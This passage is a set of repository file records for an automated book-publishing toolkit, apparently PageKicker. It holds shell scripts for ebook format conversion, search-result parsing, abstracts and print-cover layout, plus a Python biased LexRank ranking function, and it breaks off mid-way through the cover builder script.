"blob_id": "021e70a45ece3fd8e5343207b8c5903dbceb8064", "content_id": "9af1c495aa8d2019788a08f60b67fd17d8b464e7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4897, "license_type": "permissive", "max_line_length": 503, "num_lines": 153, "path": "/scripts/includes/ebook-convert.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "if [ \"$build_all_formats\" = \"yes\" ] ; then\n\n\techo \"building all available ebook formats\"\n\tbuild_bw_pdf=\"yes\"\n\tbuild_color_pdf=\"yes\"\n\tbuild_mobi=\"yes\"\n\tbuild_linkrich_epub=\"yes\"\n\tbuild_text_epub=\"yes\"\n\tbuild_txt_html_only=\"yes\"\n\tbuild_docx=\"yes\"\n\nelse\n\n\techo \"building only specified formats\"\n\nfi\n\n# converting cumulative txt file to outputs dependent on it\n\necho \"converting txt to strictly compliant epub\" \n\nxvfb-run --auto-servernum ebook-convert tmp/$uuid/\"cumulative.txt\" $mediatargetpath$uuid/$sku\"plaintxt.epub\" --smarten-punctuation --language $\"English\" --publisher \"PageKicker\" --title \"$covertitle\" --cover $mediatargetpath$uuid/cover.png --authors \"$editedby\" --enable-heuristics --chapter-mark \"pagebreak\" --formatting-type \"heuristic\" --dont-split-on-page-breaks --pretty-print --remove-first-image --formatting-type \"heuristic\" 1> /dev/null\n\n\n# checking that epub is compliant\n\necho \"running epubcheck\"\n\n$JAVA_BIN -jar $epubcheckjarpath $mediatargetpath$uuid/$sku\"plaintxt.epub\" \n\nepubchecksuccess=$?\n\necho \"epubchecksuccess on book \"$sku\"plaintxt.epub is\" $epubchecksuccess \n\n# converting cumulative html files\n\nif [ \"$build_linkrich_epub\" = \"yes\" ] ; then\n\n\techo \"converting cumulative html to linkrich epub using calibre\" \n\n\txvfb-run --auto-servernum ebook-convert tmp/$uuid/cumulative.html $mediatargetpath$uuid/$sku\"linkrich.epub\" --smarten-punctuation --language $LANG --publisher \"PageKicker\" --title \"$covertitle\" --cover $mediatargetpath$uuid/cover.png --authors \"$editedby\" --enable-heuristics --chapter-mark \"pagebreak\" --dont-split-on-page-breaks --pretty-print --remove-first-image 1> /dev/null\n\n\tcp $mediatargetpath$uuid/$sku\"linkrich.epub\" $mediatargetpath$uuid/$safecovertitle\".epub\"\n\n\techo \"converting temptoc.html to linkrich epub using calibre\"\n\t\n\n\txvfb-run --auto-servernum ebook-convert tmp/$uuid/temptoc.html $mediatargetpath$uuid/$sku\"multipart.epub\" --smarten-punctuation --language $LANG --publisher \"PageKicker\" --title \"$covertitle\" --cover $mediatargetpath$uuid/cover.png --authors \"$editedby\" --enable-heuristics --chapter-mark \"pagebreak\" --dont-split-on-page-breaks --pretty-print --remove-first-image --max-levels \"1\" 1> /dev/null\nelse\n\n\techo \"not building linkrich epub\"\n\nfi\n\nif [ \"$build_mobi\" = \"yes\" ] ; then\n\n\techo \"converting html to mobi using calibre\" \n\n\txvfb-run --auto-servernum ebook-convert tmp/$uuid/cumulative.html $mediatargetpath$uuid/$sku\".mobi\" --smarten-punctuation --insert-metadata --language $\"English\" --publisher \"PageKicker\" --title \"$covertitle\" --cover $mediatargetpath/$uuid/cover.png --authors \"$editedby\" --enable-heuristics 1> /dev/null\n\nelse\n\n\techo \"not building mobi\"\n\nfi\n\n\nif [ \"$build_docx\" = \"yes\" ] ; then\n\n\techo \"converting html to docx using pandoc\"\n\n\tpandoc -s -S --toc tmp/$uuid/\"cumulative.html\" -o $mediatargetpath$uuid/$sku\".docx\"\n\nelse\n\n\techo \"not building docx\"\n\nfi\n\n\nif [ \"$build_color_pdf\" = \"yes\" ] ; then\n\n\n\techo \"converting cumulative html to pdf using calibre and default ebook cover\" \n\n\tif [ \"$booktype\" = \"Reader\" ] ; then\n\n\t\tsize=\"5x8\"\n\n\telse\n\n\t\tsize=\"8.5x11\"\n\tfi\t\n\techo \"size is\" $size\n\n\techo \"deciding on pdfserif font\"\n\tpdfserif=$(shuf ../conf/pdfserif_fonts.txt)\n\techo \"pdfserif is\" $pdfserif\n\n\txvfb-run --auto-servernum ebook-convert tmp/$uuid/cumulative.html $mediatargetpath$uuid/$sku\"print_color.pdf\" --cover \"images/\"$uuid/ebookcover/$sku\"cover.png\" --pdf-serif-family \"$pdfserif\" --margin-left \"54\" \\--margin-right \"54\" --margin-top \"54\" --margin-bottom \"54\" --pdf-default-font-size \"14\" --pretty-print --language $LANG --publisher \"PageKicker\" --title \"$covertitle\" --cover $mediatargetpath$uuid/cover.png --authors \"$editedby\" --chapter-mark \"pagebreak\" --custom-size \"$size\" 1> /dev/null\n\n\n#echo removing page 1\n\n#pdftk $mediatargetpath$uuid/$sku\"print_tmp.pdf\" cat 2-end output $mediatargetpath$uuid$sku\"print.pdf\"\n\n#echo \"saving interior as PDFx1a\"\n\n\tif [ \"$build_bw_pdf\" = \"yes\" ] ; then\n\n\n\t# -B flag makes it b&w\n\n\t./lib/pstill_dist/pstill -M defaultall -m XimgAsCMYK -m Xspot -m Xoverprint -d 500 -m XPDFX=INTENTNAME -m XPDFXVERSION=1A -m XICCPROFILE=USWebCoatedSWOP.icc -B -o $mediatargetpath$uuid/$sku\"bw.pdf\" $mediatargetpath$uuid/$sku\"print_color.pdf\"\n\n\t# cp $mediatargetpath$uuid/$sku\"print_nocover.pdf\" $mediatargetpath/$sku\"print.pdf\"\n\n\telse\n\n\t\techo \"not building b&w pdf\"\n\n\tfi\n\nelse\n\n\techo \"not building color or bw pdfs\"\n\nfi\n\n\nif [ $userdescription = \"yes\" ] ; then\n\n\techo \"appending user description to book metadata\"\n\tcat bin/xform-includes/userdescription.txt >> tmp/$uuid/shortdescription.html\n\tcat bin/xform-includes/userdescription.txt >> tmp/$uuid/lsi-shortdescription.txt\n\nelse\n\n\techo \"no user description was provided\"\n\nfi\n\n\nif [ \"$mylibrary\" = \"yes\" ] ; then\n\t\n\tcp $mediatargetpath/$uuid/$sku\"plaintxt.epub\" $mediatargetpath\"../calibre-import/\"\n\techo \"copied \"$sku\"plaintxt.epub to my calibre library\" \n\nelse\n\n\techo \"calibre import flag was off\" \n\nfi\n" }, { "alpha_fraction": 0.680081844329834, "alphanum_fraction": 0.6834924817085266, "avg_line_length": 37.47368240356445, "blob_id": "1150fc329a0a51f97d359ee7fa1f8ef644eb1951", "content_id": "eec1dc4ecc6968043d324cb1b02ec3fededdd33d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1466, "license_type": "permissive", "max_line_length": 213, "num_lines": 38, "path": "/scripts/includes/process-nodes-from-searchresults-4-booktype-reader.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# process XML search results file when booktype is Reader -- ie relevancy search\n\n\nxmlstarlet sel -N x=\"http://opensearch.org/searchsuggest2\" -t -m \"//x:Item\" -v \"x:Url\" -n fetch/$uuid/searchresults.xml | sed '/^$/d' > fetch/$uuid/urls.txt\n\nxmlstarlet sel -N x=\"http://opensearch.org/searchsuggest2\" -t -m \"//x:Item\" -v \"x:Text\" -n fetch/$uuid/searchresults.xml | sed '/^$/d' | grep -Ev 'Wikipedia|Template|Category|Portal|Help' > fetch/$uuid/titles.txt\n\n xmlstarlet sel -N x=\"http://opensearch.org/searchsuggest2\" -t -m \"//x:Item\" -v \"x:Description\" -n fetch/$uuid/searchresults.xml | sed '/^$/d' > fetch/$uuid/descriptions.txt\n\ncat fetch/$uuid/titles.txt | grep -Ev 'Wikipedia|Template|Category|Portal|Help'\n\ncat fetch/$uuid/urls.txt | sed -e 's/;/_/g' > fetch/$uuid/safeurls.txt\ncat fetch/$uuid/titles.txt | sed -e 's/;/_/g' > fetch/$uuid/safetitles.txt\ncat fetch/$uuid/descriptions.txt | sed -e 's/;/_/g' > fetch/$uuid/safedescriptions.txt\n\npaste fetch/$uuid/urls.txt fetch/$uuid/titles.txt fetch/$uuid/descriptions.txt > fetch/$uuid/safesearchresults.txt\n\n# add this after \"x:Text\" to reinsert Description-o \", \" -v \"x:Description\" -o \", \" -v \"x:Text\"\n\ncount=1\n\ndoccount=`wc -l < fetch/$uuid/safeurls.txt`\n\nif [ \"$doccount\" = 0 ] ; then\n\n\techo \"no relevant documents for seed\" $seed | tee --append $sfb_log\n\n\tseedhasdocs=\"no\"\n\n\t\n\nelse\n\n\techo \"will be fetching \" $doccount \"documents on this seed \" $seed | tee --append $sfb_log\n\n\tseedhasdocs=\"yes\"\n\nfi\n\n\n\n\n" }, { "alpha_fraction": 0.6216475367546082, "alphanum_fraction": 0.6216475367546082, "avg_line_length": 36.28571319580078, "blob_id": "f3e57e5513ff7ca2938f00ba253879326c64b527", "content_id": "2b2a87b3e8e5c76d755e12b8fc8eece201d592b3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1044, "license_type": "permissive", "max_line_length": 98, "num_lines": 28, "path": "/scripts/includes/abstracts.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "case $summary in\nsummaries_only)\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \"# Abstracts\" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n cat \"$TMPDIR\"$uuid\"/wiki/wikisummaries.md\" | sed -e 's/#/##/' >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n ;;\ncomplete_pages_only)\n echo \"using complete pages only for main body\"\n ;;\nboth)\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \"# Abstracts\" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n cat \"$TMPDIR\"$uuid\"/wiki/wikisummaries.md\" | sed -e 's/#/##/' >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n;;\n*)\n echo \"unrecognized summary option\"\n;;\nesac\n" }, { "alpha_fraction": 0.6913043260574341, "alphanum_fraction": 0.695652186870575, "avg_line_length": 12.352941513061523, "blob_id": "b8318c84674b22b12467166d9e6eeed4177aff04", "content_id": "8924cbd07461c8fe2ca23189125757d5d47cbef3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 230, "license_type": "permissive", "max_line_length": 59, "num_lines": 17, "path": "/scripts/bin/publicity-bot.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# run the publicity bot as a cron job every six hours or so\n\n# while csv file\ndo\n\nt update \"$t_ message\" \n\nfbcmd status \"$fb_message\"\n\n# mailchimp?\n\n\ndone<../conf/publicity_bots/watch_files/watch_titles.csv\nexit\n0\n\n\n\n" }, { "alpha_fraction": 0.6655518412590027, "alphanum_fraction": 0.6825529336929321, "avg_line_length": 29.151260375976562, "blob_id": "daaa0340e90f4f445c88f40cf50e42c21be3027b", "content_id": "1a61836c4fe5139d34a8a2deb9930d8cad691521", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3588, "license_type": "permissive", "max_line_length": 129, "num_lines": 119, "path": "/scripts/includes/biased_lexrank.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#Filename: biased_lexrank.py\n\n\ndef b_lexrank(G, baseline_score, alpha = 0.85, personalization=None, max_iter=100, tol=1.0e-6, weight='weight', seed_weight = 1):\n\t\"\"\" Return the biased Lexrank scores of the nodes in the graph\n\n\t\tThis program is based upon the pagerank_scipy program from the networkx \n\t\tsource.\n\n\tParameters\n\t___________\n\tG: graph\n\t\tA NetworkX graph\n\n\talpha: float, optional\n\t\tA damping parameter for PageRank, default = 0.85\n\n\tpersonalization: dict, optional\n\t\tThe \"personalization vector\" consisting of a dictionary with a\n\t\tkey for every graph node and nonzero personalization value for each node.\n\n\tmax_iter : integer, optional\n\t\tMaximum number of iterations in power method eigenvalue solver.\n\n\ttol : float, optional\n\t\tError tolerance used to check convergence in power method solver.\n\n\tweight : key, optional\n\t\tEdge data key to use as weight. If None weights are set to 1.\n\t\n\tbaseline_score: vector, float\n\t\tsimilarity scores between the seed and sentences within the graph\n\n\n\n\tReturns\n\t-------\n\tpagerank : dictionary\n\t\tDictionary of nodes with PageRank as value\n\n\tExamples\n\t--------\n\t\t>>> G=nx.DiGraph(nx.path_graph(4))\n\t\t>>> pr=nx.pagerank_scipy(G,alpha=0.9)\n\n\tNotes\n\t-----\n\tThe eigenvector calculation uses power iteration with a SciPy\n\tsparse matrix representation.\n\n\n\t\tReferences\n\t\t----------\n\t\t.. [1] A. Langville and C. Meyer,\n\t\t \"A survey of eigenvector methods of web information retrieval.\"\n\t\t http://citeseer.ist.psu.edu/713792.html\n\t\t.. [2] Page, Lawrence; Brin, Sergey; Motwani, Rajeev and Winograd, Terry,\n\t\t The PageRank citation ranking: Bringing order to the Web. 1999\n\t\t http://dbpubs.stanford.edu:8090/pub/showDoc.Fulltext?lang=en&doc=1999-66&format=pdf\n\t\t [3] Otterbacher, Erkan and Radev, Biased LexRank: Passage Retrieval using Random\n\t\t Walks with Question-Based Priors (2008)\n\t\t\"\"\"\n\n\ttry:\n\t\timport scipy.sparse\n\t\timport networkx as nx\n\t\tfrom numpy import diag\n\t\tfrom networkx.exception import NetworkXError\n\texcept ImportError:\n\t\traise ImportError(\"pagerank_scipy() requires SciPy: http://scipy.org/\")\n\tif len(G) == 0:\n\t\treturn {}\n # choose ordering in matrix\n\tif personalization is None: # use G.nodes() ordering\n\t\tnodelist=G.nodes()\n\telif personalization is 'biased':\n\t\tnodelist = G.nodes()\n\telse: # use personalization \"vector\" ordering\n\t\tnodelist=list(personalization.keys())\n\tM=nx.to_scipy_sparse_matrix(G,nodelist=nodelist,weight=weight,dtype='f')\n\t(n,m)=M.shape # should be square\n\tS=scipy.array(M.sum(axis=1)).flatten()\n# for i, j, v in zip( *scipy.sparse.find(M) ):\n# M[i,j] = v / S[i]\n\tS[S>0] = 1.0 / S[S>0]\n\t#creates a sparse diagonal matrix with normalization values\n\tQ = scipy.sparse.spdiags(S.T, 0, *M.shape, format='csr')\n\tM = Q * M\n\tx=scipy.ones((n))/n # initial guess\n\tdangle=scipy.array(scipy.where(M.sum(axis=1)==0,1.0/n,0)).flatten()\n\t # add \"teleportation\"/personalization\n\tif personalization is 'biased':\n\t\tv = scipy.array(baseline_score)\n\t\tv = v/v.sum()\n\t\tv = seed_weight * v/v.sum()\n\t\t#print v.shape\n\t\t\n\t\t\n\telif personalization is not None:\n\t v=scipy.array(list(personalization.values()),dtype=float)\n\t v=v/v.sum()\n\telse:\n\t v=x\n\t #print v.shape\n\t \n\ti=0\n\twhile i <= max_iter:\n\t # power iteration: make up to max_iter iterations\n\t xlast=x\n\t x=alpha*(x*M+scipy.dot(dangle,xlast))+(1-alpha)*v\n\t x=x/x.sum()\n\t # check convergence, l1 norm\n\t err=scipy.absolute(x-xlast).sum()\n\t if err < n*tol:\n\t return dict(list(zip(nodelist,list(map(float,x)))))\n\t i+=1\n\traise NetworkXError('pagerank_scipy: power iteration failed to converge'\n\t 'in %d iterations.'%(i+1))\n" }, { "alpha_fraction": 0.7209818363189697, "alphanum_fraction": 0.738466739654541, "avg_line_length": 30.70575714111328, "blob_id": "537bc0c0811651f863647339dea33faa936ba7b6", "content_id": "6f042503d9050689f79f7947de6ee2859d4581bf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 14870, "license_type": "permissive", "max_line_length": 221, "num_lines": 469, "path": "/scripts/includes/print-cover-builder.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# run from $SFB_HOME\"scripts\"\n\n. ./flags.sh\n\n. ../conf/config.txt\n\n# . bin/float_fx.sh\n\necho \"printconfigfile is \"$printconfigfile\n\nif [ $printconfigfile = \"yes\" ] ; then\n\n\t . ../conf/printconfig.txt\n\n\techo \"using print configuration from file\" | tee --append $sfb_log\n\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"new uuid for this instance is\" $uuid | tee --append $sfb_log\n\n\n\tmkdir images/$uuid\n\techo \"created directory images/\"$uuid\n\nelse\n\n\techo \"using print configuration passed along from parent process\" | tee --append $sfb_log\n\techo \"uuid passed along from parent is\" $uuid | tee --append $sfb_log\n\nfi\n\n\n\n# print cover builder\n\necho \"starting print cover builder\" | tee --append $sfb_log\n\n# cleanup previous images\n\n# rm -rf images/\n# echo \"removed previous images\" | tee --append $sfb_log\n\n\ncd images/$uuid ; mkdir print ; echo \"created directory images/$uuid/print\" ; cd $scriptpath ; echo \"changed directory back to \" $scriptpath | tee --append $sfb_log\n\n# print cover builder is inserted into cases in cover-build.sh depending on values received from xform\n\n# now echoing values of variables that will be needed to build the print cover\n\n\necho \"booktype was \" $booktype | tee --append $xform_log\necho \"simpleseed was \" $simpleseed | tee --append $xform_log\necho \"coverfont was\" $coverfont | tee --append $xform_log\necho \"covercolor was\" $coverfont | tee --append $xform_log\necho \"covercolorfont was\" $covercolorfont | tee --append $xform_log\necho \"coverRGB was\" $coverRGB | tee --append $xform_log\necho \"userdescription was \" $userdescription > $scriptpath\"bin/xform-includes/userdescription.txt\" | tee --append $xform_log\necho \"imagebase was \" $imagefilename| tee --append $xform_log\necho \"printcreate was \" $printcreate| tee --append $xform_log\necho \"pagecount was \" $pagecount | tee --append $xform_log\necho \"trimsize was\" \"$trimsize\" | tee --append $xform_log\necho \"spinewidth was\" \"$spinewidth\" | tee --append $xform_log\necho \"printbookprice was\" $printbookprice | tee --append $xform_log\necho \"aliastobackendcopy was\" $aliastobackendcopy | tee --append $xform_log\necho \"copyinbackend was\" $copyinbackend | tee --append $xform_log\necho \"userprovidedprintISBN was \"$userprovidedprintISBN | tee --append $xform_log\n\n# convert spine width to pixels\nasterisk=\"*\"\ndpi=\"300\"\n\nspinepixelsfloat=`python -c \"from math import ceil ;print ceil($spinewidth*300)\"`\necho \"spinepixelsfloat is \" $spinepixelsfloat\nfor rounded in $(printf %.0f $spinepixelsfloat); do spinepixels=$rounded ; done\n# convert trim size to pixel height and width of full canvas\n\ncase $trimsize in\n\n\t5x8pb)\n\t\tpagewidth=1500\n\t\tpageheight=2400 \n\n\t;;\n\n\t55x85pb)\n\t\tpagewidth=1650\n\t\tpageheight=2550\n\n\t;;\n\t6x9pb)\n\t\tpagewidth=1800\n\t\tpageheight=2700\n\t;;\n\t6x9laminate)\n\t\tpagewidth=1800\n\t\tpageheight=2700\n\t;;\n\t6x9case)\n\t\tpagewidth=1800\n\t\tpageheight=2700\n\t;;\n\t8x10pb)\n\t\tpagewidth=2400\n\t\tpageheight=3000\n\t;;\n\t8x10laminate)\n\t\tpagewidth=2400\n\t\tpageheight=3000\n\t;;\n\t8.5x11pb)\n\t\tpagewidth=2550\n\t\tpageheight=3300\n\t;;\n\t8.5x11laminate)\n\t\tpagewidth=2550\n\t\tpageheight=3300\n\t;;\n\n\t*)\n\tcanvaswidth=\"n/a\"\n\theight=\"n/a\"\n\t\techo \"no trim size was available, exiting\" | tee --append $sfb_log\n\texit\n\t;;\n\nesac\n\necho \"assigned pagewidth as \" $pagewidth \"and height as\" $height \"pixels\" \n\n# canvas calculations\n\tbleed=38\n\n\tcanvaswidth=$(( $pagewidth * 2 + $spinepixels + $bleed + $bleed ))\n\tcanvasheight=$(( $bleed + $pageheight + $bleed ))\n\n\techo \"calculated canvaswidth as \"$canvaswidth\n\techo \"calculated canvasheight as \"$canvasheight\n\n\t#calculate text safety areas\n\n\ttextsafety=150\n\n\tsafepagewidth=$(( $pagewidth - $textsafety - $textsafety ))\n\tsafepageheight=$(( $pageheight - $textsafety ))\n\n\techo \"calculated safepagewidth as\" $safepagewidth\n\techo \"calculated safepageheight as\" $safepageheight\n\n# spine calculations\n\n\tif [ $spinepixels -lt 105 ] ; then\n\t\tspinesafety=12\n\telse\n\t\tspinesafety=22\n\tfi\n\n\techo \"because spine width is less than 105 pixels, spinesafety is \" $spinesafety\n\n\tsafespinetitlewidth=$(( $spinepixels - $spinesafety - $spinesafety ))\n\n\techo \"safespinetitlewidth is\" $safespinetitlewidth\n\n\tsafespinetitleheight=$(( $safepageheight / 2 ))\n\n\techo \"calculated safespinetitleheight as \" $safespinetitleheight\n\n\tspineleftmargin=$(( $bleed + $pagewidth + $spinesafety ))\n\n\techo \"calculated spineleftmargin as bleed + page width +spinepixels for \" $spineleftmargin\n\n# front page calculations\n\n\tfrontpageflushleftmargin=$(( $bleed + $pagewidth + $spinepixels + $textsafety ))\n\n\techo \"calculated frontpageflushleftmargin as\" $frontpageflushleftmargin\\\n\n\t# there's always a cushion around top and bottom text t\n\n\tfrontpagetopcushion=150\n\n\tfrontpagebottomcushion=0\n\n\techo \"frontpagetopcushion is \" $frontpagetopcushion\n\techo \"frontpagebottomcushion is \" $frontpagebottomcushion\n\n\n# back page calculations\n\n\tISBNylocation=$(( $safepageheight - 372 - 25 ))\n\tISBNxlocation=$(( 150 + 25 ))\n\n\n# build objects that are always the same\n\n\t# build the bottom canvas\n\n\tx=\"x\"\n\n\tconvert -size $canvaswidth$x$canvasheight xc:$newcovercolor \\\n\t-units \"PixelsPerInch\" -density 300 -resample 300x \\\n\timages/$uuid/print/bottomcanvas.png\n\n#\t# build the front page canvas\n\n#\tconvert -size $pagewidth$x$height xc:$newcovercolor images/$uuid/print/frontpagecanvas.png\n\n#\t# build the back page canvas\n\n#\tconvert -size $pagewidth$x$height xc:$newcovercolor images/$uuid/print/backpagecanvas.png\n\n\t# build the ISBN\n\n\tpython $scriptpath/lib/bookland-1.4/bookland -o images/$uuid/print/$sku.eps -f OCRB -b 1 -q --rgb 0,0,0 --cmyk 0,0,0,1.0 \"$userprovidedprintISBN\" 90000\n\n\tconvert -units \"PixelsPerInch\" -density 300 -resample 300x -border 25x25 -bordercolor white images/$uuid/print/$sku.eps -colorspace CMYK images/$uuid/print/ISBN$sku.png\n\n# now decide which cover to use\n\ncase $coverlayout in\n\n\n2) \n\n# build objects that are always the same except sometimes they are translucent\n\n\techo \"using cover layout id=2, front window, simple image in center of front cover, text on back\"\n\n\n\t\t# build the spine caption\n\n\t\tconvert -size $safespinetitleheight$x$safespinetitlewidth -background $newcovercolor -fill \"$coverfontcolor\" -font $coverfont -rotate 90 -gravity West caption:\"$escapeseed\" images/$uuid/print/spinecaption.png\n\n\t\t# build the spine Nimble Books LLC caption\n\n\t\tconvert -size $safespinetitleheight$x$safespinetitlewidth -background $newcovercolor -fill \"$coverfontcolor\" -font $coverfont -rotate 90 -gravity West caption:\"Nimble Books LLC\" images/$uuid/print/spinenimblecaption.png\n\n\t# use the golden ratio to define the vertical size of the page elements: title/subtitle block = 0.31 (1/2 golden ratio), image = 0.382 , byline/logotype = 0.31\n\n\t\t# top section = safepageheight * .31\n\n\t\ttopsectionpixelsfloat=`python -c \"from math import ceil ;print ceil($safepageheight*0.31)\"`\n\t\tfor rounded in $(printf %.0f $topsectionpixelsfloat); do topsectionpixels=$rounded ; done\n\t\techo \"topsectionpixels is \" $topsectionpixels\n\n\n\t\ttitleheight_step1=$(( $topsectionpixels - $frontpagetopcushion ))\n\t\ttitleheight=$(( $titleheight_step1 / 2 ))\n\t\tsubtitleheight_step1=$(( $topsectionpixels - $frontpagetopcushion ))\n\t\tsubtitleheight=$(( $subtitleheight_step1 / 2 ))\n\n#\t\tif [ $subtitle = \"none\" ] ; then\n#\t\t\ttitleheight=$(( $titleheight * 2 ))\n#\t\t\tsubtitleheight=0\n#\t\t\techo \"no subtitle, so big title\"\n#\t\telse\n#\t\t\techo \"creating both title and subtitle blocks\"\n#\t\tfi\n\n\t\techo \"title block is \" $titleheight \"pixels high\"\n\t\techo \"subtitle block is \" $subtitleheight \"pixels high\"\n\n\t\timageheightfloat=`python -c \"print($safepageheight*0.382)\"`\n\t\tfor rounded in $(printf %.0f $imageheightfloat); do imageheight=$rounded ; done\n\t\techo \"imageheight is calculated as\" $imageheight\n\n\t\t# adjust imageheight to provide a 20-px buffer around the image so that it does not bump into the title or byline boxes\n\t\timagebuffer=20\n\n\t\timageheight=$(( $imageheight - $imagebuffer -$imagebuffer ))\n\n\t\tbottomsectionpixelsfloat=`python -c \"from math import ceil ;print ceil($safepageheight*0.31)\"`\n\t\t\t\tfor rounded in $(printf %.0f $bottomsectionpixelsfloat); do bottomsectionpixels=$rounded ; done\n\t\techo \"bottomsectionpixels is \" $bottomsectionpixels\n\n\t\tbylinevertical_step1=$(( $bottomsectionpixels - $frontpagebottomcushion ))\n\t\tbylinevertical=$(( $bylinevertical_step1 / 2 ))\n\t\tlogotypevertical_step1=$(( $bottomsectionpixels - $frontpagebottomcushion ))\n\t\tlogotypevertical=$(( $logotypevertical_step1 / 4 ))\n\n\t\techo \"bylinevertical is \" $bylinevertical\n\t\techo \"logotypevertical is \" $logotypevertical\n\n\n\t\tbylinetopheight=$(( $safepageheight - $bylinevertical ))\n\t\tlogotypetopheight=$(( $safepageheight - $logotypevertical ))\n\n\t\techo \"calculated bylinetopheight as \" $bylinetopheight\n\t\techo \"calculated logotypetopheight as \" $logotypetopheight\n\n\t\t# build the title caption\n\n\n\n\t\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -font $coverfont -size $safepagewidth$x$titleheight caption:\"$escapeseed\" images/$uuid/print/titlecaption.png\n\n\t\t# build the subtitle caption\n\n\n\t\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -font $coverfont -size $safepagewidth$x$subtitleheight caption:\"$subtitle\" images/$uuid/print/subtitlecaption.png\n\n\t\t# build the byline caption\n\n\t\tbylineheight=$(( $safepageheight / 10 ))\n\n\t\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -font $coverfont -size $safepagewidth$x$bylineheight caption:\"$author\" images/$uuid/print/bylinecaption.png\n\n\t\t# build the Nimble Books logotype caption\n\n\t\t# calculate the space available for logotype\n\n\t\tsafelogotype=$(( $safepagewidth ))\n\t\tlogotypeheight=$(( $safepageheight / 20 ))\n\n\t\techo \"calculated safe area for logotype as \" $safelogotype\n\n\t\tconvert -size $safelogotype$x$logotypeheight -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -font $coverfont caption:\"Nimble Books LLC\" images/$uuid/print/logotypecaption.png\n\n# import the image and get it into right format and size\n\n\t\techo \"imagefilename is \" $imagefilename\n\n\t\t# how big is the initial image and how many dpi\n\n\t\tinitialheight=`identify -format \"%h\" images/$imagefilename`\n\t\tinitialwidth=`identify -format \"%w\" images/$imagefilename`\n\t\tinitialxdensity=`identify -format \"%x\" images/$imagefilename`\n\t\tinitialydensity=`identify -format \"%y\" images/$imagefilename`\n\t\techo \"initialheight and initialwidth were \"$initialheight \"and \" $initialwidth\n\t\techo \"initialxdensity and initialydensity were \"$initialxdensity \"and \" $initialydensity\n\t\tinitialxdensity_num=`echo $initialxdensity | sed 's/\\([0-9]*\\).*/\\1/'\n`\n\t\tinitialydensity_num=`echo $initialydensity | sed 's/\\([0-9]*\\).*/\\1/'\n`\n\t\tif [ \"$initialxdensity_num\" -lt \"72\" ] ; then\n\t\t\techo \"xdensity is less than 72; image must be 72 dpi; exiting ...\"\n\t\t\texit 1\n\t\telse\n\t\t\techo \"x dpi ok\"\n\t\tfi\n\t\t\n\t\tif [ $initialydensity_num -lt 72 ] ; then\n\t\t\techo \"ydensity is less than 72; image must be 72 dpi; exiting ...\"\n\t\t\texit 1\n\t\telse\n\t\t\techo \"y dpi ok\"\n\t\tfi\n\n\t\tconvert images/$imagefilename -resize $imageheight$x$pagewidth\\> images/$uuid/print/$sku\"frontimage\".png\n\n\t\tresizedwidth=`identify -format \"%w\" images/$uuid/print/$sku\"frontimage\".png`\n\t\tresizedheight=`identify -format \"%h\" images/$uuid/print/$sku\"frontimage\".png`\n\t\techo \"resized image width is \" $resizedwidth\n\t\techo \"resized image height is \" $resizedheight\n\n\t# begin laying down the objects on the front page\n\n\t# lay the spine on top of the canvas\n\n\t\tconvert images/$uuid/print/bottomcanvas.png \\\n\t\timages/$uuid/print/spinecaption.png -geometry +$spineleftmargin+150 -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t## lay the ISBN box at the bottom left corner of the back page\n\n\t\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/ISBN$sku.png -geometry +$ISBNxlocation+$ISBNylocation -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t## lay the title on top of the front page\n\n\t\tfrontpagetitletop=$(( $bleed + $frontpagetopcushion ))\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/titlecaption.png -geometry +$frontpageflushleftmargin+$frontpagetitletop -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t## lay the subtitle on top of the front page\n\n\t\tfrontpagesubtitletop=$(( $bleed + $frontpagetopcushion + $titleheight ))\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/subtitlecaption.png -geometry +$frontpageflushleftmargin+$frontpagesubtitletop -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t## lay the front image in the center of the front 